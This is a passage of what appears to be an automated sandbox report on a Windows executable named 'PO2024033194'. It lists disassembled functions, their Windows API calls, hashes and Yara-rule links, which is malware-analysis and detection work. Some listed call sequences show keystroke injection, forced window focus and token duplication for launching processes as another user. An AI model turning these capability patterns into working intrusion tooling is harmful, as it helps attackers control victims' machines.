                                                                  Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                  • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                  • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                  • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                  Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                  Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                  • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                  • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                  • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                  Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                  • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                  • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                  • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                  Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _memmove.LIBCMT ref: 00444B34
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_memmove
                                                                  • String ID:
                                                                  • API String ID: 1183979061-0
                                                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                  Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __lock_file
                                                                  • String ID:
                                                                  • API String ID: 3031932315-0
                                                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                  Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                  • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                  • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                  • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                  Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wfsopen
                                                                  • String ID:
                                                                  • API String ID: 197181222-0
                                                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                  Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                  • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                  • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                  • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                  Function 0416536C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 04165381
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction ID: 63184506d27f71ee2d5632c6098eb13256104a80bc9b850491c943206eaf66f2
                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction Fuzzy Hash: C0E0BF7494020DEFDB00EFA8D6496DE7BB4EF04701F1005A1FD05D7680DB709E648A62
                                                                  Function 04165370 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 04165381
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: 6df3acb9fc2e28a748e3ae9e4d8e97938ec7dd3be94d0666275cc26a794eb83c
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: 6BE0E67494020DEFDB00EFB8D6496DE7FB4EF04701F100561FD05D2280D7709D608A62

                                                                  Non-executed Functions

                                                                  Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                                                  • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                  • _wcsncpy.LIBCMT ref: 0047CA29
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                  • SendMessageW.USER32 ref: 0047CA7F
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                  • ImageList_SetDragCursorImage.COMCTL32(0093DD48,00000000,00000000,00000000), ref: 0047CB9B
                                                                  • ImageList_BeginDrag.COMCTL32(0093DD48,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                  • SetCapture.USER32(?), ref: 0047CBB6
                                                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                  • SendMessageW.USER32 ref: 0047CD12
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                  • SendMessageW.USER32 ref: 0047CD80
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                  • SendMessageW.USER32 ref: 0047CE93
                                                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,00901B60,00000000,?,?,?,?), ref: 0047CF1C
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                  • SendMessageW.USER32 ref: 0047CF6B
                                                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,00901B60,00000000,?,?,?,?), ref: 0047CFE6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 3100379633-4164748364
                                                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                  Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 00434420
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                  • IsIconic.USER32(?), ref: 0043444F
                                                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 2889586943-2988720461
                                                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                  Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                  • _wcslen.LIBCMT ref: 00446498
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _wcsncpy.LIBCMT ref: 004464C0
                                                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                  • CloseDesktop.USER32(?), ref: 0044657A
                                                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
